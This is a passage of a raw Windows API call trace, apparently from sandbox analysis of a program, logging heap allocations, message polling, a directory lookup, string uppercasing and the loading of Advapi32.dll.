Flags=0x0, Size=0x10) returned 0x34aab68 [0251.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0251.723] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0251.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0251.723] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ditreDSOdEug3Tyrxp1", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3d5f6c90, ftCreationTime.dwHighDateTime=0x1d4ce26, ftLastAccessTime.dwLowDateTime=0xa917faa0, ftLastAccessTime.dwHighDateTime=0x1d4c8af, ftLastWriteTime.dwLowDateTime=0xa917faa0, ftLastWriteTime.dwHighDateTime=0x1d4c8af, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20530, dwReserved1=0xbc25, cFileName="ditreDSOdEug3Tyrxp1", cAlternateFileName="DITRED~1")) returned 0xaa58e0 [0251.723] FindClose (in: hFindFile=0xaa58e0 | out: hFindFile=0xaa58e0) returned 1 [0251.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0251.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0251.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0251.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0251.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0251.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0251.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0251.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0251.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0251.724] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0251.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0251.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0251.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0251.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0251.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0251.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0251.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0251.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0251.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1818 [0251.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0251.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0251.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0251.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0251.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0251.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0251.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0251.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0251.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0251.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0251.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0251.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0251.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0251.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0251.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0251.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0251.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0251.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0251.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0251.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0251.726] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0251.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0251.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0251.726] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0251.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0251.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0251.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa7a8 [0251.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0251.726] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0251.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0251.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0251.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0251.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0251.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0251.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0251.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0251.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0251.727] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0251.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0251.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0251.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0251.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0251.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0251.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0251.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0251.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0251.727] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0251.727] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0251.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0251.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0251.727] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0251.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0251.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0251.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa610 [0251.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0251.728] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0251.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0251.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0251.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0251.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0251.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0251.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0251.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0251.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0251.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0251.728] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0251.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0251.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0251.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0251.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0251.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0251.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0251.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0251.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0251.729] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0251.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0251.729] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0251.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0251.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0251.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0251.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0251.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0251.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0251.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0251.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0251.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0251.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0251.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0251.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0251.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0251.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0251.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0251.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0251.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0251.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0251.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0251.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0251.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0251.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0251.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0251.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0251.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0251.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0251.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0251.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0251.730] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0251.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0251.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0251.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0251.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0251.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0251.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0251.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0251.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0251.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0251.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0251.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0251.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0251.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0251.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0251.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0251.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0251.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0251.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0251.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0251.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0251.731] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0251.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0251.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0251.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0251.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0251.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0251.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0251.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0251.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0251.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0251.732] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0251.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0251.732] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0251.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0251.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0251.732] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0251.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0251.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0251.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0251.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1428 [0251.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0251.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0251.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0251.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0251.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa958 [0251.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0251.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0251.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0251.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0251.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0251.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0251.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0251.733] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0251.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0251.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0251.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0251.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0251.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0251.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0251.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0251.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0251.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0251.734] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0251.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0251.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0251.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0251.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0251.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0251.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0251.734] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0251.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0251.734] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0251.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0251.735] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0251.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0251.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0251.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0251.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0251.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0251.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0251.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0251.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0251.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0251.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0251.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0251.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0251.735] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0251.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0251.735] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0251.736] 